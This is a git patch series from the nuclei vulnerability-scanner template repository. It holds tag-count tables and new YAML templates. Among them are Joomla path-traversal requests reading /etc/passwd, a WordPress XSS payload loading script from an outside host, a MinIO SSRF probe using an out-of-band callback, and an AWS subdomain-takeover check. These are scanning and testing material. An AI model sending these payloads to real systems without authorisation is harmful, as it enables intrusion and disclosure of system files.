| | | | | | | +| razor | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| apiman | 1 | | 
| | | | | | | +| rmi | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| feifeicms | 1 
| | | | | | | | | +| gespage | 1 | | | | | | | | | +| lotus | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| pulsesecure | 1 | | | 
| | | | | | +| phpunit | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| shopware | 1 | | | | | 
| | | | +| s3 | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| cofax 
| 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| minio | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | 
+| metinfo | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| openvpn | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| cves2016 | 1 | | | | | | | | | +| tidb | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| 
moinmoin | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 869329e073..8f2daf4bdb 100644 --- a/TOP-10.md +++ b/TOP-10.md 
@@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | -| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | -| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | -| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | -| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | -| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | -| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | -| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | -| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | +| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 | +| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 | +| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 | +| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 | +| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | | +| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | | +| rce | 195 | gy741 | 72 | takeovers | 63 | | | | | +| tech | 169 | madrobot | 62 | default-logins | 56 | | | | | +| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | | +| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | | From 403f152e0047d765a3a3fe5e0e580c5a6954a65e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 Sep 2021 20:34:38 +0000 Subject: [PATCH 259/339] Auto Update README [Mon Sep 13 20:34:38 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) 
diff --git a/README.md b/README.md index 5487e31afc..89a5851073 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | -| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | -| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | -| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | -| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | -| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | -| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | -| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | -| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | +| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 | +| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 | +| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 | +| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 | +| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | | +| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | | +| rce | 195 | gy741 | 72 | takeovers | 63 | | | | | +| tech | 169 | madrobot | 62 | default-logins | 56 | | | | | +| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | | +| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | | -**150 directories, 2015 files**. +**164 directories, 2063 files**. From 83795af535ff95f71833a28720dd0c110ecd6c7c Mon Sep 17 00:00:00 2001 
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Tue, 14 Sep 2021 05:11:22 +0700
Subject: [PATCH 260/339] Create CVE-2010-1952.yaml
---
cves/2010/CVE-2010-1952.yaml | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 cves/2010/CVE-2010-1952.yaml
diff --git a/cves/2010/CVE-2010-1952.yaml b/cves/2010/CVE-2010-1952.yaml
new file mode 100644
index 0000000000..5e71f4a39f
--- /dev/null
+++ b/cves/2010/CVE-2010-1952.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1952
+
+info:
+ name: Joomla! Component BeeHeard 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12239
+ - https://www.cvedetails.com/cve/CVE-2010-1952
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From c38efae94085677bd4415c52f313e7c168341506 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Tue, 14 Sep 2021 05:24:38 +0700
Subject: [PATCH 261/339] Create CVE-2010-1352.yaml
---
cves/2010/CVE-2010-1352.yaml | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 cves/2010/CVE-2010-1352.yaml
diff --git a/cves/2010/CVE-2010-1352.yaml b/cves/2010/CVE-2010-1352.yaml
new file mode 100644
index 0000000000..5dd77fa70f
--- /dev/null
+++ b/cves/2010/CVE-2010-1352.yaml
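Review bot: Every match here hinges on the `%00` terminator in the request path being honoured, and PHP has rejected NUL bytes in file paths since 5.3.4, so a non-match says nothing about whether `controller` is still traversable on a current stack; `description` should carry that caveat, e.g. `Detection relies on null-byte truncation and will not fire on PHP >= 5.3.4 even where the component is vulnerable.` The same request shape and matcher are repeated verbatim in the CVE-2010-1352 hunk of the next commit and the CVE-2010-1957 hunk further down, so the caveat applies to all three. In the CVE-2010-1352 hunk the `name` says `Juke Box 1.7` while its `description` lists 1.0 and 1.7 as affected; align the two. Style: the blank line between `matchers:` and the first `- type: regex` entry is not used by the other templates in this series and can go.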
@@ -0,0 +1,27 @@ +id: CVE-2010-1352 + +info: + name: Joomla! Component Juke Box 1.7 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12084 + - https://www.cvedetails.com/cve/CVE-2010-1352 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 598eaf62d66eabb98389136354e5f7626abc271e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 14 Sep 2021 05:33:49 +0700 Subject: [PATCH 262/339] Create CVE-2014-9444.yaml --- cves/2014/CVE-2014-9444.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2014/CVE-2014-9444.yaml diff --git a/cves/2014/CVE-2014-9444.yaml b/cves/2014/CVE-2014-9444.yaml new file mode 100644 index 0000000000..ee9101bfe7 --- /dev/null +++ b/cves/2014/CVE-2014-9444.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-9444 + +info: + name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 + - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' part: body - type: word 
From 4b1bca299d7beb8c5aff228a9b0e7b536877840b Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Tue, 14 Sep 2021 17:31:27 +0700
Subject: [PATCH 266/339] Create CVE-2021-21287.yaml
---
cves/2021/CVE-2021-21287.yaml | 28 ++++++++++++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100644 cves/2021/CVE-2021-21287.yaml
diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml
new file mode 100644
index 0000000000..1cc1953f08
--- /dev/null
+++ b/cves/2021/CVE-2021-21287.yaml
@@ -0,0 +1,28 @@
+id: CVE-2021-21287
+
+info:
+ name: MinIO Browser API SSRF
+ author: pikpikcu
+ severity: high
+ description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability.
+ reference: |
+ - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21287
+ - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
+ tags: cve,cve2021,minio,ssrf,oob
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/minio/webrpc'
+ body: |
+ {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"}
+ headers:
+ Host: {{interactsh-url}}
+ Content-Type: application/json
+
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http" # Confirms the HTTP Interaction
From ede2e49751e727673302214403e83d1e272b6eff Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 14 Sep 2021 16:52:28 +0530
Subject: [PATCH 267/339] Update CVE-2021-21287.yaml
---
cves/2021/CVE-2021-21287.yaml | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml
index 1cc1953f08..2d801cbdd7 100644
--- a/cves/2021/CVE-2021-21287.yaml
+++ b/cves/2021/CVE-2021-21287.yaml
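Review bot: `Host: {{interactsh-url}}` under `headers:` is an unquoted scalar beginning with `{`, which YAML parses as a flow mapping rather than the string nuclei needs, so the header map most likely fails to decode and the template never runs; quote it the way `path` already is: `Host: "{{interactsh-url}}"`. The line survives as context in the second hunk of the next commit, and the later rewrite of this request into a `raw:` block scalar sidesteps the problem only because the header then lives inside `|`. The `description` also never says how the interaction is produced; apparently the server is expected to make an outbound request derived from the `Host` header, which is why the only matcher is on `interactsh_protocol`, and one sentence stating that would spare the next maintainer reverse-engineering it.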
@@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. - reference: | + reference: - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q @@ -17,9 +17,11 @@ requests: - '{{BaseURL}}/minio/webrpc' body: | {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} + headers: Host: {{interactsh-url}} Content-Type: application/json + User-Agent: Mozilla/5.0 matchers: - type: word From d38052f05a8b6d00d0508af3af35102cdbcb3870 Mon Sep 17 00:00:00 2001 From: Rotem Reiss Date: Tue, 14 Sep 2021 14:26:36 +0300 Subject: [PATCH 268/339] Improve AWS Elasticbeanstalk Improve AWS Elasticbeanstalk with a better matcher to prevent high-severity alerts on non-hijackable domains and add an extractor for better usage. --- dns/elasticbeantalk-takeover-detection.yaml | 25 +++++++++++++++++---- 1 file changed, 21 insertions(+), 4 deletions(-) diff --git a/dns/elasticbeantalk-takeover-detection.yaml b/dns/elasticbeantalk-takeover-detection.yaml index a4b596bf90..c5dfc13a46 100644 --- a/dns/elasticbeantalk-takeover-detection.yaml +++ b/dns/elasticbeantalk-takeover-detection.yaml 
@@ -5,11 +5,20 @@ info: author: philippedelteil severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 # kudos to @m7mdharoun for sharing process details. - https://twitter.com/payloadartist/status/1362035009863880711 - https://www.youtube.com/watch?v=srKIqhj_ki8 tags: dns,takeover,aws +# You need to claim the CNAME in AWS portal (https://aws.amazon.com/) or via AWS CLI to confirm the takeover. +# Do not report this without claiming the CNAME. +# +# CLI command to verify the availability of the environment: +# aws elasticbeanstalk check-dns-availability --region {AWS_REGION} --cname-prefix {CNAME_PREFIX} +# Example: +# CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com +# Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c + dns: - name: "{{FQDN}}" type: A @@ -18,9 +27,17 @@ dns: retries: 3 matchers-condition: and matchers: - - type: word - words: - - "elasticbeanstalk" + - type: regex + name: elasticbeanstalk + regex: + # Only CNAMEs with region specification are hijackable. + - \.(us|af|ap|ca|eu|me|sa)\-(east|west|south|northeast|southeast|central)\-[1-9]+\.elasticbeanstalk\.com + condition: or - type: word words: - "NXDOMAIN" + extractors: + - type: regex + group: 1 + regex: + - "IN\tCNAME\t(.+)" From 81fbbf028054b7dc608dfb09b0fd79c7555fdb7f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 14 Sep 2021 16:59:42 +0530 Subject: [PATCH 269/339] Update elasticbeantalk-takeover-detection.yaml --- dns/elasticbeantalk-takeover-detection.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/dns/elasticbeantalk-takeover-detection.yaml b/dns/elasticbeantalk-takeover-detection.yaml index c5dfc13a46..79aa08e653 100644 --- a/dns/elasticbeantalk-takeover-detection.yaml +++ b/dns/elasticbeantalk-takeover-detection.yaml 
